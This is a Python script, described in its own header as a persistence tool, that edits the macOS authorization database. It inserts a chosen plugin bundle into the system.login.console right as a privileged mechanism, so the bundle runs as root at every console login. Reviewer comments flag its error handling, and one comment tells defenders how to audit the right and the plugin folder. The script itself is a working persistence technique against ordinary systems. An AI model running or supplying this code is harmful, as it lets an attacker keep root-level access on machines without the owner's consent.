python script to install authorization plugin that requests system.login.console right
#!/usr/bin/python | |
# Install an authorization plugin for persistence.
# Original script here: https://github.com/chilcote/pylab/blob/070c328bc4929e7e7042f6bd1e42d2700abb05e4/auth_db.py
# The system.login.console right should be used for auth plugins.
# ex: installplugin.py evilAuthPlugin
import sys | |
import objc | |
from ctypes import CDLL, c_void_p, byref, c_char_p | |
from ctypes.util import find_library | |
from PyObjCTools import Conversion | |
# Load Security.framework through ctypes and bind the three Authorization
# Services entry points used below. No argtypes/restype are declared, so
# ctypes applies its default conversions (C int return values).
Security = CDLL(find_library("Security.framework"))
AuthorizationCreate = Security.AuthorizationCreate
AuthorizationRightGet = Security.AuthorizationRightGet
AuthorizationRightSet = Security.AuthorizationRightSet
def authorization_right_get(right):
    """Fetch the current definition of an authorization right.

    Args:
        right: Name of the right to look up (this script passes
            "system.login.console").

    Returns:
        A mutable copy of the right definition, wrapped as a PyObjC object,
        or None when AuthorizationRightGet left the output pointer empty.
    """
    rule_ref = c_void_p()
    # NOTE(review): the status code returned by AuthorizationRightGet is
    # discarded; only the out-pointer decides between a result and None.
    AuthorizationRightGet(right, byref(rule_ref))
    if not rule_ref:
        return None
    # Wrap the raw pointer so PyObjC can treat it as an Objective-C
    # collection, then copy it so the caller does not hold the original.
    return objc.objc_object(c_void_p=rule_ref).mutableCopy()
def authorization_right_set(right, value):
    """Write a new definition for an authorization right.

    Args:
        right: Name of the right to overwrite.
        value: PyObjC property-list object holding the new definition; its
            raw pointer is handed to AuthorizationRightSet.

    Returns:
        Whatever AuthorizationRightSet returns (its status code). The caller
        in this script does not inspect it.
    """
    session = c_void_p()
    # NOTE(review): the result of AuthorizationCreate is not checked, and the
    # authorization reference it fills in is never released in this function.
    AuthorizationCreate(None, None, 0, byref(session))
    definition_ptr = value.__c_void_p__()
    status = AuthorizationRightSet(
        session, right, definition_ptr, None, None, None
    )
    return status
if __name__ == '__main__':
    # What this entry point changes on the host: it rewrites the
    # "system.login.console" right in the macOS authorization database so
    # that "<bundle>:login,privileged" is evaluated at console login.
    # Mechanisms marked "privileged" are run with root privileges.
    #
    # For defenders: compare the output of
    #   security authorizationdb read system.login.console
    # with a known-good baseline, and audit the bundles present in
    # /Library/Security/SecurityAgentPlugins. A mechanism entry that does not
    # belong to the OS or to approved management software deserves review.
    if len(sys.argv) <= 1:
        print "Please provide the bundle name, without the extension"
        # NOTE(review): a usage error exits with status 0.
        sys.exit(0)

    plugin_bundle = sys.argv[1]
    target_right = "system.login.console"

    # NOTE(review): authorization_right_get may return None, in which case
    # the subscript below raises TypeError; .index() raises ValueError when
    # the anchor mechanism is absent. Neither case is handled.
    current_rule = authorization_right_get(target_right)
    # Position of the HomeDirMechanism:status entry; the new mechanism is
    # placed directly after it.
    anchor = current_rule["mechanisms"].index("HomeDirMechanism:status")
    new_mechanism = u"{}:login,privileged".format(plugin_bundle)

    # The PyObjC object is converted to plain Python collections so the
    # mechanisms list can be edited, then converted back to a property list.
    editable_rule = Conversion.pythonCollectionFromPropertyList(
        current_rule, conversionHelper=None
    )
    mechanisms = editable_rule['mechanisms']
    mechanisms.insert(anchor + 1, new_mechanism)
    updated_rule = Conversion.propertyListFromPythonCollection(
        editable_rule, conversionHelper=None
    )

    # Write the modified right back to the authorization database.
    # NOTE(review): the returned status is ignored, so "Done" is printed
    # whether or not the update was accepted.
    authorization_right_set(target_right, updated_rule)
    print "Done"